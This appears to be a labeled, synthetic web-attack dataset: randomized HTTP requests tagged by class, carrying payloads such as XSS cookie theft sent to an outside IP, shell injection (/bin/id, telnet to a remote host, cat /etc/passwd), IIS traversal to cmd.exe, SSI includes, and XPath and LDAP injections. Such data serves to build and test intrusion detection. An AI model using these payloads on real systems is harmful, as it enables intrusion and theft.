If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 7318
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest uri=http://oo7ich.fr/nILa.rar
Range: 89-7,-933
Referer: /a3ei3g/liaohyu/u6Ia/09pmw0de.doc
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: lgeumacsodrowo
UA-CPU: PowerPC
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5993x410
Via: Atxfa/0.2 www.wepf.tiff:6674, 6.2 14.204.244.157:08388, HTTP/0.8 www.ernsrn.js
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40851
Start - Id: 46912
class: XSS
POST /weeaaszeeeervh0/xEsioqdtrhs.asmx? HTTP/1.0
Content-Length: 346
Content-Language: rTcueoeb,e,N
Content-Encoding: deflate
Content-Location: http://www.njeuosdy.uk/ailn.swf
Content-MD5: a25hZHRzQmZvaUVqc3J0bw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Wed, 18 Feb 09 05:42:49 CET
Host: www.slndcfhsor.uk
Connection: keep-alive
Accept: video/*, image/*;q=0.1, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: toOnEou-gletkdhg, n0rauart-nerget;q=0.3, al-ad, tv-ehnddap;q=0.6, e-nxtetein
Cache-Control: no-store
Client-ip: 120.233.216.134
Cookie: tah=rnf;msqh=eg4H0KLmR1;U2IJ_R-e-=544;GserdlhhEl1dmv=eRt6CUVrUww;0FdQ31n@J=e1ue%sdN/0dd7nuehttpsn\exec&
Cookie2: $Version="1"
Date: Wed, 26 Sep 07 07:05:42 UTC
ETag: W/"utOApzZbAhT5WSy.P0"
Expect: 100-continue
From: nlqn@timuoEgjAR.ch
If-Modified-Since: Tue, 28 Dec 04 16:44:26 UTC
If-Unmodified-Since: Wed, 28 Apr 04 01:03:42 UTC
If-Match: *
If-None-Match: "fVGh6Hz4BFoC-uY8Hu"
If-Range: *
Max-Forwards: 7
MIME-Version: 9.1
Pragma: Tupcp='eoroji'
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM cmw1YXRhNmVhdHRFdG5taGRwdDJuaGhud3VGc2VtZWpjZXY3aWlz
Range: -790
Referer: /Seveelh.mdb
TE: trailers
Trailer: Range
User-Agent: eamo (t5ounjYHYY; noqd8@vZG; eryW69sp)
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8473x700
Via: FTP/2.8 www.csOvs.js
Transfer-Encoding: 2gtilt
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

ohitUlysao0E=Tn&ets=84586256&t0zitnis3=5&sn7ta7tgoeaP=evqa&rvintdtnnnlgo=61&etjKntIcIIyiS=unodes&uhw=<xml  src  =  " javascript:   [window.open('http://43.78.125.151/mest.php4'+document.cookie);]">&hdnafohtEce=C2esoeeowbhtdqro7&litsadeed=nqbr6&346Ncfua=t&iKg=hcizBUR_nH2-&uhgxGrseandumra=iUrnantfyeori@y2Xarl

End - Id: 46912
Start - Id: 45253
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.rNeolc.de
Connection: ech5E
Accept: image/gif;q=0.6, application/*;q=0.4, audio/*;q=0.4
Accept-Charset: us-ascii;q=0.5, windows-1251;q=0.7
Accept-Encoding: gzip;q=0.4, compress;q=0.1, deflate
Accept-Language: *
Cache-Control: min-fresh=44
Client-ip: 225.124.231.31
Cookie: hyTyuWttp=thye8nawtns?/3l;xQFSW=+rEgpisock_streamoa
Cookie2: $Version="34"
Date: Wed, 09 Jan 08 06:24:28 GMT
ETag: "l6UvzhoFlq__9RNYOSC"
Expect: nT6mf=6igw
From: 77tu@22noeois.uk
If-Modified-Since: Thu, 03 Feb 05 21:02:34 GMT
If-Unmodified-Since: Sun, 11 Dec 05 22:52:37 CET
If-Match: *
If-None-Match: "ZnGQD8BYj2k0iDd9UR"
If-Range: *
Max-Forwards: 6162
MIME-Version: 1.7
Pragma: sli=lctxBCei
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM dW1rMjB2bWFFaDNlbm50dWUycnJyc2FhYWJzdGllbGZycjhtZzllbHRoNG1lZQ==
Range: -249,23568-43
Referer: /itrOn/eleothah/zohbho.gif
TE: deflate,trailers,deflate;q=0.1
Trailer: Accept
User-Agent: o4Eofox9-L http://www.nscerrys.net
UA-CPU: x86
UA-Disp: 711,6058,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 8.8 232.43.46.142
Transfer-Encoding: identity
Upgrade: b9r/9.4
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 181.253.151.130
X-Serial-Number: 67855229
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45253
Start - Id: 43336
class: OsCommanding
GET /saCtsxNhhdnsl/Turm0reddfao/nnPg1fBGY5x55/0_dqfCIifc4_vHV/sh6gcNzcxG11m/ih1hun6eobfaseu5he/7ronopt/26ICiyw1/iWQ/tedilinsgtivwiroct.jpeg?24qG@CC8DTR5=%3Ba+e&dlfiapu8s=r&wte6A=t8mh2n&sonNTou=%5C%3B+%5C%2Fbin%5C%2Fid+++%3B HTTP/1.1
Host: 41.116.246.178:328
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 72.77.48.25
Cookie: 4nhalDsahreaEa=hmqxeaesoa;htpassu5IJGq5r=09;qJXFjoHe=erni;ueuthaacx1n=54;a7aneuetr=6511273577
Cookie2: $Version="4"
Date: Sat, 12 Jun 04 15:41:35 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Mon, 30 Apr 07 12:24:45 UTC
If-Match: *
If-None-Match: "yuNxv@Jzq@P3bONvJgm"
If-Range: "4.JV.yFYeE-kl2@q2"
Max-Forwards: 8961
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM enJvaHVucXplRnN4ZnRlZWVkMzhwZnQ4cjJqeXRhaDlxdDAyZQ==
Authorization: Digest nonce
Range: -3
Referer: http://www.trn1oc.ch/dii04/oNeFt/qOoetnmo/k03w.shtml
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/1.6 (compatible; MSIE 0.2; Mac OS X; ree2iurtE; r9eiggq3eo; Idnaaopek)
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4509x153
Via: 2.8 www.ea9nten.tiff, FTP/8.2 11.137.75.51
Transfer-Encoding: deflate
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 736 www.zmeftdme.shtml:69 "oNaciecieersUyiosal" 
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43336
Start - Id: 35865
class: XPathInjection
GET /icbdPrMFVbDB5FsGxDSk/oohltoeamdcsn/BCeval_EwKwT/i65kuTYMmG7V8a@h/akyislomihaum/GEtee7S/iryt2u0ishPaty5ap2/u5WIvMdVnbXq6t5U./j4UPcopy@jpassthruz./eetebsqhvfnx9nhhnbm/u./DWg.mspx?Q_9EMnYH=sS6%40LkLyKNA&PyIo0as=2455575428&uSvbscript0=9ebh-%3A%29ca%5Dbtvhret&LTkC27echoPpm=thsagE%27++++or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28+++%29%3D%28%28+++i+++%2Bj+++%2B+++k++%2B++l++++%2B++++1%29%5D++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++%27fc%27+%3D%27+ajweG%27+++++or&iaeielgtlTbfmhd=6&nta7ddnuxaoteS=o5949i&Ee3otagu=e4pa7taTsr3e&reOwqco=m&0Wtw=7srtf&5tLahmhatEn=spg-t&zekxs9=433 HTTP/1.0
Host: 167.30.86.108:0988
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-ce, gb2312;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: wtede-ocOneye;q=0.1, set3eir-3;q=0.8, ttsthaa-nmT;q=0.1
Cache-Control: no-transform
Client-ip: 155.41.173.240
Cookie: ethnutijanugbl9=a iti euhe)7m;efeaeinUzhna0J=40;edfaaa6agt=1ibgsound<
Cookie2: $Version="3"
Date: Sun, 17 Oct 04 23:48:56 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: thfd=bPowg;c7ssvbC=i2Beg1
From: alcSeiee@shniectns.be
If-Modified-Since: Fri, 04 Feb 05 15:44:47 UTC
If-Unmodified-Since: Wed, 07 Jul 04 19:30:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 534
MIME-Version: 3.1
Pragma: ry4rPld='ns'
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: pzmf yIHbtl=3h7iydj
Range: -15
Referer: http://www.z2niinib.st/shrbda/62hrIH/ooacetw/2Rotpue.jsp
TE: gzip;q=0.3
Trailer: Cache-Control
User-Agent: deie (cAlrw.; a2UglBWn; mepzOSR; nz8ADQO8u1)
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: iuee/1.8 143.8.72.25
Transfer-Encoding: trBvi0
Upgrade: ei2y/3.0
Warning: 214 www.RSadse.tiff:91 "st7qet" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35865
Start - Id: 42923
class: OsCommanding
GET /eT/gJ0lQA/zi2fAT/0utswos/aupGIR3E4Se/rDzb@a84..jpeg?utiQeri9=rxisttsiu7jtUi&nirtoEef23Cwea=aLr%3Bei%3Dlink%3Emservicesdrpl&eaFuht=14210291&_Q-DSformv8=bgnogsoowig&e2tc=tealib&whsed0p=vN1AqvPIE&zoonpeia3lis=r&em=tth%3Caee&bBreplace9nph-sBHP2form=hcvaendad%7Ew HTTP/1.1
Host: www.uweshgo1so.uk:9
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: \"     \;     \/usr\/bin\/telnet  www.alaler.com    32     ;
Accept-Language: *
Cache-Control: no-transform
Client-ip: 22.171.202.170
Cookie: tava5eec6stet3e=q6Z;xenejEetasaem7I=65274;fPr=sKo;OadzQsdbhr3suea=tnxQm&l;iS9t=xtermoAin
Cookie2: $Version="1"
Date: Mon, 28 Dec 09 10:43:49 CET
ETag: "5E.6ZDTdRKI89MzLURL"
Expect: s6mt
If-Modified-Since: Fri, 21 Jul 06 19:58:19 CET
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: "aFDfvF5YOZqBL6AG"
If-None-Match: "3nCfw4UONXfj@0duRL"
If-Range: "@7_OeZt6DIk94qIZu6ES"
Max-Forwards: 1956
MIME-Version: 4.5
Pragma: rmv=h
Proxy-Authorization: Basic QWdkZWhUZzpoZUxvV3U=
Authorization: at5tn Dmlme=OlAtaNK
Range: 761836-
Referer: /etchd/cello.cfm
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ieco6iiisy (fI.xFW2BmE; r510up2EF; 37CoEL; rN28YP4.Ki; iXbbHHq9oS)
UA-CPU: Sparc
UA-Disp: 3828,378,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0091x1254
Via: 4.3 48.242.64.201
Transfer-Encoding: identity
Upgrade: olEofa/6.2, 8uc/9.8, mieh/1.6
Warning: 693 72.185.193.141 "mpaahyapeHnYMdI" "Thu, 05 May 05 03:45:41 CET"
X-Forwarded-For: 15.151.59.253
X-Serial-Number: 740578265962
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42923
Start - Id: 49649
class: XPathInjection
GET /oemWOT93Y9YYF1qnw_/snrirree/.ApositionDinsertBI5b/nfaeultds6nnbs2oayzr/uE9isQ6W5Ih3G2mo./orRukfN2F-/0bdivaUwgetT75/Eeri/en.jpeg?rOim=seoisgaamfhtheha&osdvdofueae=owasieowindow.opene&eh7aen=454444&ONGU=9hloEtrlAehesho17o&c5eOte=C+is&Wh8nnaos3sd=2scie8dhdubihtee&NkFMXn=tmpwhere%25m&esi9kuelsd=sy%29eA%7CvCrahddropacTtexec&ugusdhnl=%3F3+&gge0ec4bvdflbei=cFt3&eb2iIvj=56&lue5=l%2Fj%2Fue%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D017%5D++++or+%27rmdakT%27++%3D++%27&yb=l1Hfv7V7jZiP&iiml=ef HTTP/1.0
Host: 160.194.241.160
Connection: close
Accept: video/mpeg;q=0.6
Accept-Charset: *
Accept-Encoding: identity, gzip, deflate, identity;q=0.1, identity;q=0.5
Accept-Language: o-dth7eMlm;q=0.4, orarc-En, lensEaq-woiew;q=0.7
Cache-Control: only-if-cached
Client-ip: 108.249.101.218
Cookie: einwa1ofmLl=0;caecahonhe5=4mpsz;ueegtk1oFeastt=y1th4lS1;7s=eq0ie
Date: Sat, 05 Jul 08 15:37:16 GMT
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 09 Jun 07 06:29:22 CET
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "IN7EhMwQ.ARu3vM"
If-None-Match: "y@gyu40UFW2RU@gHub"
If-Range: *
Max-Forwards: 5921
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXlzaHZjZ2VXaHJlcDF1Qmkxc2RoZWFpdHlxczRnczZpcW1GdDZr
Authorization: Digest uri=http://mna4agle.it/ahffsu/so9n/rtiEyi0e/miafb/toahlqn.pdf
Range: 4-,650706-6695,41362-
Referer: /axtwtt/hrNvsd/6hAawsne.pdf
TE: trailers,gzip;q=0.6
Trailer: Accept-Language
User-Agent: dcntmuorp (syTRxA; sg2ZYQ; dDKNd4; piirJSKa)
Via: FTP/8.5 27.119.206.224:746, eSEi/9.0 www.8ntn.jpg, HTTP/3.0 www.eimda.html:2
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49649
Start - Id: 43662
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 158.9.6.155:80
Connection: lkve5ld
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=326
Cookie: taaeartiel=tngovulcuqaDAqa;sgso4t=kpt r[deirjyd4rform;behzt1=tintb2
Date: Sat, 12 Dec 09 21:56:35 CET
ETag: W/"vIAsssT5MPBJtm8Z8RlU"
If-Modified-Since: Fri, 16 Dec 05 18:16:43 CET
If-Unmodified-Since: Wed, 24 Mar 04 22:05:48 GMT
If-Match: "4RwpNY5ja7vm3k-"
If-None-Match: "aQv.P6W6o6GbeiSxKqn"
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Referer: http://www.a8ds.gov/v8ti6xT/6rpsRr.js
TE: chunked,gzip;q=0.9
User-Agent: Mozilla/4.4 (compatible; MSIE 7.0; Linux i586; RaEyRt7)
Via: FTP/1.2 www.ehKh1oy.js:9, 2.2 www.iSaFszw.shtml, HTTP/3.9 www.gmihoAai.gif:764
Transfer-Encoding: deflate

null

End - Id: 43662
Start - Id: 36848
class: OsCommanding
PUT /shetsa5aeHri2/aH59nU/2tUi/gb/rh16x9haaoese1/sY_O1.gif? HTTP/1.1
Content-Length: 35
Content-Language: x
Content-Encoding: deflate
Content-Location: http://www.mhnlt.cz/kurr7r/e2rmbe/ltweo3s/o6he.dll
Content-MD5: aWFyZTRqb3ZUd2k3MGJkbw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 07 Oct 08 07:14:04 UTC
Host: www.tdp9.net
Connection: mseR
Accept: video/*, image/*;q=0.0
Accept-Charset: iso-8859-4, x-mac-icelandic, utf-7;q=0.3, us-ascii, x-mac-greek
Accept-Encoding: *;q=0.5
Cache-Control: Itn='ewrso'
Cookie: 7eepc1t=|cat   ../../../../../../../etc/passwd    |;eant=415;ntauaoYcgkunHH=tmprs1 lstmeeaiIsamh&;cxe=05114
Cookie2: $Version="14"
If-Unmodified-Since: Tue, 12 Sep 06 16:37:55 CET
Pragma: no-cache
Range: 8132-
Referer: /7fnxatao.shtml
User-Agent: iprb (h5nvbZlRz; h7hi.j)
Transfer-Encoding: compress

a1usE6yv2owt=s1tk3ge&rnrrnonrh=r1ns

End - Id: 36848
Start - Id: 39366
class: SSI
GET /cmRoleb3t8tlAIa/EJU@D-U.cfm?rotir=ee0fRWkL1b&AnEr0os9Bl=d4Eersg2RAlep&S2raesossme=%3D1&0seGae9snlblew=tItmph&rkb=3&aa=edfromasdoAboot.inidosaad&fenz=6rqc&ntqtfqGzF9eds=245&onspel=ne42+&5epnQtne=nana&ysaoyscntucr1=pG50MJ&dsl=63&bodyasrbinI@nwoe@=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&rgcasea0s=iiCsOF6%40I1Sf&ilfTisyul5tmoi=dna6z HTTP/1.1
Host: 223.250.9.150
Connection: keep-alive
Accept: video/quicktime;q=0.6, application/*;q=0.9, video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2890
Client-ip: 45.135.150.208
Cookie: esos1=5290;deleteun-RgdrmR=o87ifAetct;yoslDulIk=eecrss;yn5wrunz=esdmrn;nder=Riamd;dtgtrfcuakhn=595956
Cookie2: $Version="92"
Date: Fri, 02 May 08 21:05:24 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Fri, 08 Oct 04 01:48:34 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Mar 10 09:43:29 GMT
Max-Forwards: 0995
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZGkwcmFGeXU6ZXBUc2Q=
Authorization: Digest nonce
Range: 3517-0,7-1
Referer: /tdnt9is.asp
TE: chunked,deflate,deflate
Trailer: Referer
User-Agent: enJxemrvhgqhnga
UA-CPU: 68000
UA-Disp: 071,646,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: FTP/9.0 239.111.113.3, HTTP/3.2 134.109.189.125
Transfer-Encoding: compress
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39366
Start - Id: 45629
class: PathTransversal
GET /hoo9P5mfte1eietoRm/hTkVOyeG@/ro0lszeFr3vttGtcs/eVZ4vD@gq/cdNQ9LWPPUDARbq0keBG.png?pcte5m9s7mdh=%5Cautoexec.bat&utrixi=TO%27&rOlsBi=lMcphpecaM&lhndoc9o=325&hicd3Ctnm=t HTTP/1.1
Host: www.rrgrn.be
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-4
Accept-Encoding: compress;q=0.6, deflate, compress, deflate
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Fri, 29 May 09 11:00:02 CET
ETag: W/"sYyB35YeGsihhcrLD"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Sun, 16 Nov 08 23:06:32 CET
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic b2pOYWVJdDplNzFv
Range: 41-9272,-212,7881-582
Referer: http://tega.gov/8qgtd9i/ecoe/6goetwh.jpeg
TE: chunked
Trailer: Transfer-Encoding
User-Agent: ss1tl0
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45629
Start - Id: 38976
class: LdapInjection
GET /pUo5-@S6fnnUjj_ZqCa_/UbimgoVmi4O/G0@cE/6od5t/pi.mspx?Cystedrlgichf=86030&uz6uD@selectwtmp2y=u9o0fswoyshao&tujtmeFk=s3pU&dKonJPkVdrOz=%29+%28+++%7C+++%28displayName%3Dhad*%29+++%28name++++%3D+had*+++%29%28+mail%3Dhad*+%29 HTTP/1.0
Host: www.tdOhaue.uk
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=9017
Client-ip: 39.110.44.223
Cookie: yrTKYD=rgdsjmddTcephh4ed5
Date: Sat, 26 Aug 06 05:02:12 CET
If-Modified-Since: Wed, 08 Aug 07 16:55:29 CET
If-Unmodified-Since: Wed, 11 Jul 07 16:50:12 UTC
If-Match: *
If-None-Match: "Ezqb9hGyhg4TGD-ns"
If-Range: "kPL8_tZ-AvK_FZsOv"
Max-Forwards: 9077
MIME-Version: 8.0
Pragma: no-cache
Authorization: Basic MGRsdWQ6ZG5zYWc=
Range: 4-376,4029-
Referer: http://tdrnL.be/y0zeo2/5mxe/untecnt1/ttdecg/ewn3.cfm
TE: gzip;q=0.8,chunked;q=0.2
Trailer: Max-Forwards
User-Agent: gtrde (i@SFs.p5; l@YzRtm; tOT-RKsiX7; lg3CIP)
UA-Pixels: 9003x7790
Via: 7.5 www.uuwuwE.gif, 4.1 www.rsgtnt.jpg
Upgrade: densbt/0.0, UOwo/3.9, ciyntc/3.0, tneod/0.5, rcsker/3.3
Warning: 291 www.9uop.js "voehitwHsNuovsder" "Mon, 25 Jan 10 10:06:46 CET"
X-Serial-Number: 70747450
----: ---------------------

null

End - Id: 38976
Start - Id: 40568
class: SSI
GET /e1/yWLYTN9/ooMihtgro3issWbd/eM5n@og/rQ.cdPsEwdC/72eeaeeuuo/bUPf9iv55_9gctBwQ/WnkpoelStsaxttnuR8/ab_wzTk/srN4FQF/fwaexlopuEenOpN5.mspx?UY52httpsZ=tt&iesliane=hu4ej&0deh=g9%27d&dhttTrrhrFmend=loz%3F+xirr%29&E1=bM4PHQK&ntbRfec2trsoad5=wuoeshreoeak&ruiAbaIar=3820&ca19=yr82._F&heux4eb9xs2=2745&jotefldtdi=%3C%21--%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E HTTP/1.0
Host: 228.217.155.237
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 65.35.166.11
Cookie: 6nmhoa2nk=329
Cookie2: $Version="84"
Date: Fri, 16 Jul 04 07:51:52 GMT
ETag: "U.WS7WY8nuKS6LBUOBr5"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sun, 10 Dec 06 17:24:05 UTC
If-Unmodified-Since: Wed, 14 Jan 04 02:35:13 GMT
If-Match: "dEMvzW.D2QQLuE3ly"
If-None-Match: "m3XJCyfgckt14Mfk"
If-Range: Mon, 09 Jun 08 20:50:18 UTC
Max-Forwards: 53
Pragma: no-cache
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest algorithm=MD5-sess
Range: -296381
Referer: http://www.seaie.gov/ltz5h/nclvxju/Isw5n/eltWl/At5heio.php3
TE: gzip;q=0.1
Trailer: Host
User-Agent: 4Ax4mt (c2JgNcHqi; gSRwgOe@j; yyqkQL_E; aZ89YH-g2Y; a_OOYs-v)
UA-CPU: PowerPC
UA-Disp: 5809,4725,8
UA-OS: Win9x
UA-Pixels: 0455x286
Via: 7.4 www.l9oerdse.shtml, 8.3 2.227.97.136
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 93.136.204.39
X-Serial-Number: 56779
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40568
Start - Id: 49327
class: XPathInjection
GET /5cSiDgEqy_Qke-.nizwZ/r7p-Il/qgqyxJjLiQ/sxcteiane/oMIfM0KGgI73_Ufvj/elDfceitgsgIN1ocaO/no2reaTpeput/ngtF.css?2xtoe=24AfVP6ky&Op53L5tY=wselectIcrisa&f0o7eieeaddw=55350+++or++1%3C++qtziae%2FEoveyu%2Fcv9od%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D527%5D+or+++++58581%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tic=zqI_&aa=5816081326 HTTP/1.0
Host: 227.98.34.155
Connection: close
Accept: image/png;q=0.1, video/*, text/xml
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.6, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 23.87.77.7
Cookie: baeohBtFshlet1=76246;twhdoniH=e0cqdAxan(1esock_stream3;ed=nts7;faZTmR=44686;me5Tti=ecao;7jre=hr'
Cookie2: $Version="94"
Date: Fri, 06 Jul 07 10:53:32 GMT
ETag: "f-78hbGcyMFOKmfms"
Expect: 100-continue
From: 5sny@toesr.uk
If-Modified-Since: Mon, 08 Sep 08 24:30:08 GMT
If-Unmodified-Since: Sun, 11 Feb 07 13:54:07 CET
If-Match: "gyKNbR_I5KPfq01"
If-None-Match: *
If-Range: *
Max-Forwards: 62
MIME-Version: 6.3
Pragma: ee5rhcb='se'
Proxy-Authorization: Digest response="d0ae87B45D5a7ceD8A37AdE3bc88eEd6"
Authorization: Basic c29pZTplbHRxcmVN
Range: -8
Referer: /9age2/8m2r.js
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.1 (X11; U; Linux i586 2.3; rn-oh; rv:2.3.6) Gecko/41805429
UA-CPU: StrongARM
UA-Disp: 576,409,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 4.5 www.emhukO.tiff, FTP/7.8 www.ansa.tiff
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 906 www.mgsdP.jpg "luEthgfredan" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 6608359
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49327
Start - Id: 43792
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.lnj2.uk
Connection: keep-alive
Accept: application/*;q=0.8, image/*, image/gif;q=0.5
Accept-Charset: shift_jis, x-mac-arabic;q=0.8, x-mac-turkish
Accept-Encoding: *;q=0.0
Accept-Language: seds-eehNartf, gr0sej-nzd, poscDLcc-hhmeie;q=0.2, ta0EoTru-sTd8;q=0.6
Cache-Control: max-stale=34
Client-ip: 50.135.195.138
Cookie: eqrsueto=>;zsz=aootfclP0t6tMciDn;sodwe4mtndACeta=t;63Eas=728226881;Eebehpa4l=69236
Cookie2: $Version="730"
Date: Fri, 24 Aug 07 09:11:55 UTC
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: eOrde=mEgiaao
From: qto7read@r8owxth.de
If-Modified-Since: Sun, 30 Mar 08 11:56:33 UTC
If-Unmodified-Since: Thu, 02 Apr 09 24:12:52 CET
If-Match: *
If-None-Match: "X0vDchMuUzzbLnZ"
If-Range: Thu, 28 Apr 05 19:22:49 CET
Max-Forwards: 5947
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: Digest uri=http://www.di4ltNi.ch/aeide/eyaUyier/treawTa.nsf
